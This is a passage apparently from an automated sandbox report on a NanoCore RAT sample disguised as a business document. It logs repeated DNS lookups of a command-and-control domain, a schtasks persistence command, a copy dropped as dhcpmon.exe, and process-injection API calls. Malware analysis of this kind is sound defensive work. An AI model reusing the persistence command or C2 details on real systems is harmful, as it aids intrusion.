Feb 23, 2021 08:05:02.569204092 CET	53	56621	8.8.8.8	192.168.2.4
Feb 23, 2021 08:05:03.394757032 CET	63116	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:05:03.453761101 CET	53	63116	8.8.8.8	192.168.2.4
Feb 23, 2021 08:05:05.471314907 CET	64078	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:05:05.522981882 CET	53	64078	8.8.8.8	192.168.2.4
Feb 23, 2021 08:05:11.087408066 CET	64801	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:05:11.147933960 CET	53	64801	8.8.8.8	192.168.2.4
Feb 23, 2021 08:05:15.607594013 CET	61721	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:05:15.656356096 CET	53	61721	8.8.8.8	192.168.2.4
Feb 23, 2021 08:05:18.286993980 CET	51255	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:05:18.338680983 CET	53	51255	8.8.8.8	192.168.2.4
Feb 23, 2021 08:05:23.629424095 CET	61522	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:05:23.689316034 CET	53	61522	8.8.8.8	192.168.2.4
Feb 23, 2021 08:05:27.322935104 CET	52337	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:05:27.384254932 CET	53	52337	8.8.8.8	192.168.2.4
Feb 23, 2021 08:05:33.698035002 CET	55046	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:05:33.755517006 CET	53	55046	8.8.8.8	192.168.2.4
Feb 23, 2021 08:05:36.045073986 CET	49612	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:05:36.104753971 CET	53	49612	8.8.8.8	192.168.2.4
Feb 23, 2021 08:05:38.525880098 CET	49285	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:05:38.583254099 CET	53	49285	8.8.8.8	192.168.2.4
Feb 23, 2021 08:05:43.667853117 CET	50601	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:05:43.728954077 CET	53	50601	8.8.8.8	192.168.2.4
Feb 23, 2021 08:05:46.936856985 CET	60875	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:05:47.008913994 CET	53	60875	8.8.8.8	192.168.2.4
Feb 23, 2021 08:05:47.624486923 CET	56448	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:05:47.684530020 CET	53	56448	8.8.8.8	192.168.2.4
Feb 23, 2021 08:05:48.317285061 CET	59172	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:05:48.366059065 CET	53	59172	8.8.8.8	192.168.2.4
Feb 23, 2021 08:05:48.810966969 CET	62420	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:05:48.867979050 CET	53	62420	8.8.8.8	192.168.2.4
Feb 23, 2021 08:05:49.130503893 CET	60579	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:05:49.202219009 CET	53	60579	8.8.8.8	192.168.2.4
Feb 23, 2021 08:05:49.402358055 CET	50183	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:05:49.474764109 CET	53	50183	8.8.8.8	192.168.2.4
Feb 23, 2021 08:05:50.065048933 CET	61531	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:05:50.128010988 CET	53	61531	8.8.8.8	192.168.2.4
Feb 23, 2021 08:05:50.780194998 CET	49228	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:05:50.837344885 CET	53	49228	8.8.8.8	192.168.2.4
Feb 23, 2021 08:05:51.198170900 CET	59794	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:05:51.256272078 CET	53	59794	8.8.8.8	192.168.2.4
Feb 23, 2021 08:05:51.664412022 CET	55916	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:05:51.721954107 CET	53	55916	8.8.8.8	192.168.2.4
Feb 23, 2021 08:05:52.639295101 CET	52752	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:05:52.700978041 CET	53	52752	8.8.8.8	192.168.2.4
Feb 23, 2021 08:05:53.391177893 CET	60542	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:05:53.448240995 CET	53	60542	8.8.8.8	192.168.2.4
Feb 23, 2021 08:05:55.640450954 CET	60689	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:05:55.698538065 CET	53	60689	8.8.8.8	192.168.2.4
Feb 23, 2021 08:05:58.879259109 CET	64206	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:06:00.162163019 CET	64206	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:06:00.224046946 CET	53	64206	8.8.8.8	192.168.2.4
Feb 23, 2021 08:06:05.252437115 CET	50904	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:06:05.311299086 CET	53	50904	8.8.8.8	192.168.2.4
Feb 23, 2021 08:06:12.445050955 CET	57525	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:06:12.502271891 CET	53	57525	8.8.8.8	192.168.2.4
Feb 23, 2021 08:06:19.625576973 CET	53814	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:06:19.688391924 CET	53	53814	8.8.8.8	192.168.2.4
Feb 23, 2021 08:06:24.408164978 CET	53418	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:06:24.466933966 CET	53	53418	8.8.8.8	192.168.2.4
Feb 23, 2021 08:06:26.392512083 CET	62833	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:06:26.443986893 CET	53	62833	8.8.8.8	192.168.2.4
Feb 23, 2021 08:06:29.078402042 CET	59260	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:06:29.152302027 CET	53	59260	8.8.8.8	192.168.2.4
Feb 23, 2021 08:06:30.400244951 CET	49944	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:06:30.457842112 CET	53	49944	8.8.8.8	192.168.2.4
Feb 23, 2021 08:06:39.258706093 CET	63300	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:06:39.310410976 CET	53	63300	8.8.8.8	192.168.2.4
Feb 23, 2021 08:06:44.260832071 CET	61449	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:06:44.322439909 CET	53	61449	8.8.8.8	192.168.2.4
Feb 23, 2021 08:06:51.366480112 CET	51275	53	192.168.2.4	8.8.8.8
Feb 23, 2021 08:06:51.427912951 CET	53	51275	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 23, 2021 08:05:03.394757032 CET	192.168.2.4	8.8.8.8	0x53b8	Standard query (0)	hailongfvt.zapto.org	A (IP address)	IN (0x0001)
Feb 23, 2021 08:05:11.087408066 CET	192.168.2.4	8.8.8.8	0x4403	Standard query (0)	hailongfvt.zapto.org	A (IP address)	IN (0x0001)
Feb 23, 2021 08:05:18.286993980 CET	192.168.2.4	8.8.8.8	0x57a4	Standard query (0)	hailongfvt.zapto.org	A (IP address)	IN (0x0001)
Feb 23, 2021 08:05:23.629424095 CET	192.168.2.4	8.8.8.8	0xf1f9	Standard query (0)	hailongfvt.zapto.org	A (IP address)	IN (0x0001)
Feb 23, 2021 08:05:33.698035002 CET	192.168.2.4	8.8.8.8	0xdcab	Standard query (0)	hailongfvt.zapto.org	A (IP address)	IN (0x0001)
Feb 23, 2021 08:05:38.525880098 CET	192.168.2.4	8.8.8.8	0xcf5b	Standard query (0)	hailongfvt.zapto.org	A (IP address)	IN (0x0001)
Feb 23, 2021 08:05:43.667853117 CET	192.168.2.4	8.8.8.8	0x6fec	Standard query (0)	hailongfvt.zapto.org	A (IP address)	IN (0x0001)
Feb 23, 2021 08:05:51.198170900 CET	192.168.2.4	8.8.8.8	0x63c7	Standard query (0)	hailongfvt.zapto.org	A (IP address)	IN (0x0001)
Feb 23, 2021 08:05:58.879259109 CET	192.168.2.4	8.8.8.8	0xd0e	Standard query (0)	hailongfvt.zapto.org	A (IP address)	IN (0x0001)
Feb 23, 2021 08:06:00.162163019 CET	192.168.2.4	8.8.8.8	0xd0e	Standard query (0)	hailongfvt.zapto.org	A (IP address)	IN (0x0001)
Feb 23, 2021 08:06:05.252437115 CET	192.168.2.4	8.8.8.8	0x275e	Standard query (0)	hailongfvt.zapto.org	A (IP address)	IN (0x0001)
Feb 23, 2021 08:06:12.445050955 CET	192.168.2.4	8.8.8.8	0xc083	Standard query (0)	hailongfvt.zapto.org	A (IP address)	IN (0x0001)
Feb 23, 2021 08:06:19.625576973 CET	192.168.2.4	8.8.8.8	0xdff8	Standard query (0)	hailongfvt.zapto.org	A (IP address)	IN (0x0001)
Feb 23, 2021 08:06:24.408164978 CET	192.168.2.4	8.8.8.8	0x287f	Standard query (0)	hailongfvt.zapto.org	A (IP address)	IN (0x0001)
Feb 23, 2021 08:06:30.400244951 CET	192.168.2.4	8.8.8.8	0x35f1	Standard query (0)	hailongfvt.zapto.org	A (IP address)	IN (0x0001)
Feb 23, 2021 08:06:39.258706093 CET	192.168.2.4	8.8.8.8	0x5d41	Standard query (0)	hailongfvt.zapto.org	A (IP address)	IN (0x0001)
Feb 23, 2021 08:06:44.260832071 CET	192.168.2.4	8.8.8.8	0x693d	Standard query (0)	hailongfvt.zapto.org	A (IP address)	IN (0x0001)
Feb 23, 2021 08:06:51.366480112 CET	192.168.2.4	8.8.8.8	0x3f83	Standard query (0)	hailongfvt.zapto.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Feb 23, 2021 08:05:03.453761101 CET	8.8.8.8	192.168.2.4	0x53b8	No error (0)	hailongfvt.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)
Feb 23, 2021 08:05:11.147933960 CET	8.8.8.8	192.168.2.4	0x4403	No error (0)	hailongfvt.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)
Feb 23, 2021 08:05:18.338680983 CET	8.8.8.8	192.168.2.4	0x57a4	No error (0)	hailongfvt.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)
Feb 23, 2021 08:05:23.689316034 CET	8.8.8.8	192.168.2.4	0xf1f9	No error (0)	hailongfvt.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)
Feb 23, 2021 08:05:33.755517006 CET	8.8.8.8	192.168.2.4	0xdcab	No error (0)	hailongfvt.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)
Feb 23, 2021 08:05:38.583254099 CET	8.8.8.8	192.168.2.4	0xcf5b	No error (0)	hailongfvt.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)
Feb 23, 2021 08:05:43.728954077 CET	8.8.8.8	192.168.2.4	0x6fec	No error (0)	hailongfvt.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)
Feb 23, 2021 08:05:51.256272078 CET	8.8.8.8	192.168.2.4	0x63c7	No error (0)	hailongfvt.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)
Feb 23, 2021 08:06:00.224046946 CET	8.8.8.8	192.168.2.4	0xd0e	No error (0)	hailongfvt.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)
Feb 23, 2021 08:06:05.311299086 CET	8.8.8.8	192.168.2.4	0x275e	No error (0)	hailongfvt.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)
Feb 23, 2021 08:06:12.502271891 CET	8.8.8.8	192.168.2.4	0xc083	No error (0)	hailongfvt.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)
Feb 23, 2021 08:06:19.688391924 CET	8.8.8.8	192.168.2.4	0xdff8	No error (0)	hailongfvt.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)
Feb 23, 2021 08:06:24.466933966 CET	8.8.8.8	192.168.2.4	0x287f	No error (0)	hailongfvt.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)
Feb 23, 2021 08:06:30.457842112 CET	8.8.8.8	192.168.2.4	0x35f1	No error (0)	hailongfvt.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)
Feb 23, 2021 08:06:39.310410976 CET	8.8.8.8	192.168.2.4	0x5d41	No error (0)	hailongfvt.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)
Feb 23, 2021 08:06:44.322439909 CET	8.8.8.8	192.168.2.4	0x693d	No error (0)	hailongfvt.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)
Feb 23, 2021 08:06:51.427912951 CET	8.8.8.8	192.168.2.4	0x3f83	No error (0)	hailongfvt.zapto.org	185.140.53.139	A (IP address)	IN (0x0001)

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: COMPANY PROFILE AND DOCUMENTED OFFER.exe PID: 7052 Parent PID: 5924

General

Start time:	08:04:47
Start date:	23/02/2021
Path:	C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe'
Imagebase:	0xa70000
File size:	520704 bytes
MD5 hash:	589F3EDCF4BCCADDE074ACC68279CAB1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.672841127.0000000002E21000.00000004.00000001.sdmp, Author: Joe Security Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.673686712.000000000408C000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.673686712.000000000408C000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000000.00000002.673686712.000000000408C000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.672967750.0000000002EA8000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: schtasks.exe PID: 64 Parent PID: 7052

General

Start time:	08:04:58
Start date:	23/02/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\sjZXfoyePbSa' /XML 'C:\Users\user\AppData\Local\Temp\tmp66DE.tmp'
Imagebase:	0xbc0000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6060 Parent PID: 64

General

Start time:	08:04:58
Start date:	23/02/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: COMPANY PROFILE AND DOCUMENTED OFFER.exe PID: 5980 Parent PID: 7052

General

Start time:	08:04:59
Start date:	23/02/2021
Path:	C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe
Imagebase:	0x9a0000
File size:	520704 bytes
MD5 hash:	589F3EDCF4BCCADDE074ACC68279CAB1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: NanoCore, Description: unknown, Source: 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Chronological Activities

Analysis Process: dhcpmon.exe PID: 6848 Parent PID: 3424

General

Start time:	08:05:12
Start date:	23/02/2021
Path:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
Imagebase:	0xb50000
File size:	520704 bytes
MD5 hash:	589F3EDCF4BCCADDE074ACC68279CAB1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000002.726986309.000000000410C000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000002.726986309.000000000410C000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000008.00000002.726986309.000000000410C000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000008.00000002.724064551.0000000002F28000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000008.00000002.723420263.0000000002EA1000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Chronological Activities

Analysis Process: schtasks.exe PID: 6056 Parent PID: 6848

General

Start time:	08:05:18
Start date:	23/02/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\sjZXfoyePbSa' /XML 'C:\Users\user\AppData\Local\Temp\tmpAD4D.tmp'
Imagebase:	0xbc0000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 4112 Parent PID: 6056

General

Start time:	08:05:18
Start date:	23/02/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: dhcpmon.exe PID: 6052 Parent PID: 6848

General

Start time:	08:05:19
Start date:	23/02/2021
Path:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
Wow64 process (32bit):	true
Commandline:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
Imagebase:	0x960000
File size:	520704 bytes
MD5 hash:	589F3EDCF4BCCADDE074ACC68279CAB1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.739875552.0000000002D61000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.739875552.0000000002D61000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000E.00000002.737080835.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.737080835.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.737080835.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.739970896.0000000003D69000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.739970896.0000000003D69000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: COMPANY PROFILE AND DOCUMENTED OFFER.exe PID: 7052 Parent PID: 5924 COMPANY PROFILE AND DOCUMENTED OFFER.exeCOMMON

Executed Functions

Function 090B0040, Relevance: .9, Instructions: 917COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.683163259.00000000090B0000.00000040.00000001.sdmp, Offset: 090B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08770f4db28c9fca9fe05ffee96cf7d14dde7ddd8454833df9e792b501b3474b
Instruction ID: fe9c306df2c506f06374c90eb93c817c36eb6a1f3f46ee1847693e18e509acf0
Opcode Fuzzy Hash: 08770f4db28c9fca9fe05ffee96cf7d14dde7ddd8454833df9e792b501b3474b
Instruction Fuzzy Hash: EB727B30A002199FDB54CF68C894AEEBBF6BF88344F158969E805EB365DB34DC41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 090BF910, Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.683163259.00000000090B0000.00000040.00000001.sdmp, Offset: 090B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 196e3516e8dea9a330feb81d69a32f4d9a38ca6439be0c0af47e43636479e4bb
Instruction ID: a9365bc3a6842b9634330cf10a72c959c23742c0fba6d517d255bf6b7455a3b2
Opcode Fuzzy Hash: 196e3516e8dea9a330feb81d69a32f4d9a38ca6439be0c0af47e43636479e4bb
Instruction Fuzzy Hash: ACB10535A001158FCB08EF69C954AEDBBF2AF8D310F16C5A5E515AB3A1CB30EC45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 090B9628, Relevance: .2, Instructions: 234COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.683163259.00000000090B0000.00000040.00000001.sdmp, Offset: 090B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e90edd20364aea404bb8dc3df311c0d53a92dd39e29f1c52915ec51cc3ef5d82
Instruction ID: 529d0e711e871cfa581a0b695472968169ce719ed41dcca12ab83439d920b5f1
Opcode Fuzzy Hash: e90edd20364aea404bb8dc3df311c0d53a92dd39e29f1c52915ec51cc3ef5d82
Instruction Fuzzy Hash: 11A10275E042588FCB04CFE9C584ADEBBF2AF88348F25C529D528AB315EB349981CF50

Uniqueness

Uniqueness Score: -1.00%

Function 090BFC00, Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.683163259.00000000090B0000.00000040.00000001.sdmp, Offset: 090B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5882a8cf6782a35b8056121bf989f5a1e745543a8f03b348c8d5aa2380db87f3
Instruction ID: 7df2e5d6e044caa48ba375b44fa1c274319ff64370cb1cd12bfaa578f745d210
Opcode Fuzzy Hash: 5882a8cf6782a35b8056121bf989f5a1e745543a8f03b348c8d5aa2380db87f3
Instruction Fuzzy Hash: E9115B30D042598FCB149FA5D918BFDBBF1BB0E341F049469E955BB281C7749984CF68

Uniqueness

Uniqueness Score: -1.00%

Function 090BB078, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 090BB2AE

Memory Dump Source

Source File: 00000000.00000002.683163259.00000000090B0000.00000040.00000001.sdmp, Offset: 090B0000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 59b9cf281cdb15475ba8539ea16c799a20d5b3e57879b693e01974540dc098ea
Instruction ID: eb8f0812d3f598ca4b4e6f8f516fc8363896d7e3cd1a896c1746fd1540a04293
Opcode Fuzzy Hash: 59b9cf281cdb15475ba8539ea16c799a20d5b3e57879b693e01974540dc098ea
Instruction Fuzzy Hash: 67914A71D00219DFDB60DFA4CC81BEDBBB2BF48314F148969E819AB290DB749985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0137BBC8, Relevance: 1.7, APIs: 1, Instructions: 196COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0137BE0E

Memory Dump Source

Source File: 00000000.00000002.672628882.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 987820c03228f2bcd0f36a9272a07f439058021b0c96b19eee892ac1a242f8e1
Instruction ID: ce6f9433bf48bd0fb43222f57436a88f5761ab996dc738141ba6f68a39c0e525
Opcode Fuzzy Hash: 987820c03228f2bcd0f36a9272a07f439058021b0c96b19eee892ac1a242f8e1
Instruction Fuzzy Hash: C3711670A00B068FDB34DF2AD44475ABBF5FF88208F00892DD55AD7A54DB79E8058F91

Uniqueness

Uniqueness Score: -1.00%

Function 0137DBE0, Relevance: 1.7, APIs: 1, Instructions: 160COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0137DD8A

Memory Dump Source

Source File: 00000000.00000002.672628882.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: e3601408bfb91f79be30227c4b6b1228c6eec0aa0f682c6cbce80273c23ca31f
Instruction ID: 7eff146d679ebc27c575e9db3f0adbc10adc15d8351e1bcfc9e36efcf275774e
Opcode Fuzzy Hash: e3601408bfb91f79be30227c4b6b1228c6eec0aa0f682c6cbce80273c23ca31f
Instruction Fuzzy Hash: 106110B2C04249EFCF12CFA9C880ACDBFB1BF49304F18816AE918AB221D3759845CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0137B214, Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0137DD8A

Memory Dump Source

Source File: 00000000.00000002.672628882.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 204bd827303aff116feab913e799b5856fe0d2ba49572ceb0adc70b633dbf658
Instruction ID: ffa71e88aff5ada86c79efde437e30b4c17aea4e78c4ce79d181afcf4085f4a7
Opcode Fuzzy Hash: 204bd827303aff116feab913e799b5856fe0d2ba49572ceb0adc70b633dbf658
Instruction Fuzzy Hash: 4351AEB1D00359EFDB14CFEAC984ADEBBB5BF48314F24812AE819AB250D7749945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 090BADF0, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 090BAE80

Memory Dump Source

Source File: 00000000.00000002.683163259.00000000090B0000.00000040.00000001.sdmp, Offset: 090B0000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 4851661c72d64fd019404e0946362c7e9c9ea06110e066c7311bb79da1b4d44a
Instruction ID: e1218c540434a02dbcc55fc95424452eb610ae08012b03a2df7c0b8a2c56b52a
Opcode Fuzzy Hash: 4851661c72d64fd019404e0946362c7e9c9ea06110e066c7311bb79da1b4d44a
Instruction Fuzzy Hash: 0A21F671900359DFCB50CFA9C8857EEBBF5FF48314F10842AE969A7250C7789944CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 090BAC58, Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNELBASE(?,00000000), ref: 090BACD6

Memory Dump Source

Source File: 00000000.00000002.683163259.00000000090B0000.00000040.00000001.sdmp, Offset: 090B0000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 6985d0fffd35a4fa4adaf444788bac40990addeb7ae4cf6506177d09f6f87b28
Instruction ID: 8e81aaaf4b0c10ebf49b3ab2916a65e1e887987afa9ab6a12325d0227863b096
Opcode Fuzzy Hash: 6985d0fffd35a4fa4adaf444788bac40990addeb7ae4cf6506177d09f6f87b28
Instruction Fuzzy Hash: A6213571D043088FCB50CFAAC4857EEBBF4EF48324F14842AD559AB640CB78A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 090BAEE0, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 090BAF60

Memory Dump Source

Source File: 00000000.00000002.683163259.00000000090B0000.00000040.00000001.sdmp, Offset: 090B0000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: d3ef004287bc8179e241ecf83a7e71859dc1c9a424bb94f04796d657aa01b948
Instruction ID: f8ec51184443ea182648fff367618f8884a971a89b1aa925f815970d85673dab
Opcode Fuzzy Hash: d3ef004287bc8179e241ecf83a7e71859dc1c9a424bb94f04796d657aa01b948
Instruction Fuzzy Hash: 7B2116B19002599FCB10CFAAC8806EEBBF5FF48324F108429E519A7650C7789944CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01376DC0, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01376E47

Memory Dump Source

Source File: 00000000.00000002.672628882.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: abf441ec3a5776f0dbbae521fd48420fce20aa84c89b5c63a6ee8eb34cfa192a
Instruction ID: 393ffd26b7b5664db981ee22cd893e747102fbd3fdfb4b8793700e1ddf41f369
Opcode Fuzzy Hash: abf441ec3a5776f0dbbae521fd48420fce20aa84c89b5c63a6ee8eb34cfa192a
